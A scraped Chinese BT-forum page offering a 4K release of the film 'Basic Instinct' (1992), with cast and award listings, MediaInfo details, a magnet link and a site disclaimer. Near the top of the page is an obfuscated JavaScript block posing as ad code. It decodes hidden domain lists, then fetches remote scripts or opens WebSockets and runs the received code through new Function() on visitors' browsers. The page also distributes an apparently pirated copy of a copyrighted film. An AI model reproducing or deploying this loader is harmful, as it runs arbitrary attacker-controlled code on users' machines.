本能[英语音轨/中文字幕].Basic.Instinct.1992.2160p.4K迅雷下载-27.04GB

版主小s 1月前 331

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 本能 / 第六感追缉令(台) / 氷の微笑

◎片 名 Basic Instinct

◎年 代 1992

◎产 地 美国 / 法国

◎类 别 剧情 / 悬疑 / 惊悚

◎语 言 英语

◎上映日期 1992-03-20

◎IMDb链接 https://www.imdb.com/title/tt0103772/

◎豆瓣评分 7.8/10 (137695人评价)

◎豆瓣链接 https://movie.douban.com/subject/1291869/

◎片 长 127 分钟

◎导 演 保罗·范霍文 Paul Verhoeven (id:1055953)

◎编 剧 乔·埃泽特哈斯 Joe Eszterhas (id:1036736)

◎演 员 迈克尔·道格拉斯 Michael Douglas (id:1053620)

莎朗·斯通 Sharon Stone (id:1031822)

乔治·杜兹达扎 George Dzundza (id:1055213)

珍妮·特里普里霍恩 Jeanne Tripplehorn (id:1017915)

丹尼斯·阿尔恩特 Denis Arndt (id:1032487)

米彻·佩勒吉 Mitch Pileggi (id:1002768)

Bill Cable (id:1067730)

杰克·麦吉 Jack McGee (id:1313133)

斯蒂芬·托布罗斯基 Stephen Tobolowsky (id:1019062)

丹尼尔·冯·巴根 Daniel von Bargen (id:1165516)

韦恩·奈特 Wayne Knight (id:1025209)

多罗茜·马龙 Dorothy Malone (id:1007054)

切尔西·罗斯 Chelcie Ross (id:1041208)

布鲁斯·A·扬 Bruce A. Young (id:1169006)

马里·帕特·格里森 Mary Pat Gleason (id:1323896)

蕾拉妮·萨尔利 Leilani Sarelle (id:1027436)

杰瑞·高德史密斯 Jerry Goldsmith (id:1007116)

弗兰克·J·乌里奥斯特 Frank J. Urioste (id:1299752)

安妮·库尔贾安 Anne Kuljian (id:1289096)

艾伦·米罗伊尼克 Ellen Mirojnick (id:1010099)

罗伯·博汀 Rob Bottin (id:1276191)

保罗·勒布朗 Paul LeBlanc (id:1289615)

Vincent Prentice (id:1294861)

David Forrest (id:1283992)

查利·皮切尔尼 Charlie Picerni (id:1294498)

Vincent Prentice (id:1294861)

Margaret Prentice (id:1278536)

罗伯·博汀 Rob Bottin (id:1276191)

彼得·库兰 Peter Kuran (id:1289126)

◎标 签 情色 / 悬疑 / 美国 / 本能 / 惊悚 / 美国电影 / 经典 / 剧情

◎简 介

退休摇滚明星强尼·博兹(BillCable饰)在性行为的过程中被人用白丝巾捆绑双手后用冰锥残忍刺死。其女友凯瑟琳·特拉梅尔(SharonStone饰)是一名作家,去年出版的小说中就有双手被白丝巾捆绑的退休摇滚明星被女友用冰锥刺死的情节。虽然特拉梅尔通过了谎言测试,但曾枪杀两位游客却被判无罪的尼克·柯兰警探(MichaelDouglas饰)坚持认为特拉梅尔在说谎。因为他自己也曾接受过谎言测试,并且通过了……

◎获奖情况 (共6项)

第65届奥斯卡金像奖 (1993)

最佳剪辑(提名)

└──弗兰克·J·乌里奥斯特 (id:1299752)

最佳原创配乐(提名)

└──杰瑞·高德史密斯 (id:1007116)

第45届戛纳电影节 (1992)

主竞赛单元 金棕榈奖(提名)

└──保罗·范霍文 (id:1055953)

第50届金球奖 (1993)

电影类 剧情片最佳女主角(提名)

└──莎朗·斯通 (id:1031822)

电影类 最佳原创配乐(提名)

└──杰瑞·高德史密斯 (id:1007116)

第16届日本电影学院奖 (1993)

最佳外语片(提名)

  1. General

  2. Unique ID : 4316977171253416098766548327824978106 (0x33F6B684E5ED65EBE24AD11BC7570BA)

  3. Complete name : Basic.Instinct.1992.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 27.0 GiB

  7. Duration : 2 h 8 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 30.2 Mb/s

  10. Movie name : Basic Instinct 1992 2160p HDR UHD BluRay DTS-HD MA 5.1 x265-10bit-HDS

  11. Encoded date : UTC 2021-06-21 02:05:53

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 8 min

  22. Bit rate : 26.9 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 608 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.182

  32. Stream size : 24.1 GiB (89%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : BT.2020

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 2 h 8 min

  52. Bit rate mode : Variable

  53. Bit rate : 3 171 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 24 bits

  59. Compression mode : Lossless

  60. Stream size : 2.84 GiB (11%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Text #1

  66. ID : 3

  67. Format : PGS

  68. Muxing mode : zlib

  69. Codec ID : S_HDMV/PGS

  70. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  71. Duration : 2 h 2 min

  72. Bit rate : 32.3 kb/s

  73. Count of elements : 2918

  74. Stream size : 28.4 MiB (0%)

  75. Title : ENG

  76. Language : English

  77. Default : Yes

  78. Forced : No


  79. Text #2

  80. ID : 4

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 57 min

  86. Bit rate : 22.6 kb/s

  87. Count of elements : 2010

  88. Stream size : 19.1 MiB (0%)

  89. Title : CHS

  90. Language : Chinese

  91. Default : No

  92. Forced : No


  93. Text #3

  94. ID : 5

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 57 min

  100. Bit rate : 23.3 kb/s

  101. Count of elements : 2010

  102. Stream size : 19.7 MiB (0%)

  103. Title : CHT

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #4

  108. ID : 6

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 57 min

  114. Bit rate : 38.0 kb/s

  115. Count of elements : 2010

  116. Stream size : 32.0 MiB (0%)

  117. Title : CHS&ENG

  118. Language : Chinese

  119. Default : No

  120. Forced : No


  121. Text #5

  122. ID : 7

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 57 min

  128. Bit rate : 38.7 kb/s

  129. Count of elements : 2010

  130. Stream size : 32.6 MiB (0%)

  131. Title : CHT&ENG

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Menu

  136. 00:00:00.000 : en:Chapter 01

  137. 00:07:21.707 : en:Chapter 02

  138. 00:21:01.040 : en:Chapter 03

  139. 00:32:18.000 : en:Chapter 04

  140. 00:40:02.500 : en:Chapter 05

  141. 00:51:31.041 : en:Chapter 06

  142. 01:02:05.125 : en:Chapter 07

  143. 01:08:07.291 : en:Chapter 08

  144. 01:20:41.375 : en:Chapter 09

  145. 01:30:34.500 : en:Chapter 10

  146. 01:46:00.707 : en:Chapter 11

  147. 01:51:07.125 : en:Chapter 12


TAGS 剧情 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:8944169922057CBB735A5714250558E7B4A24293
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回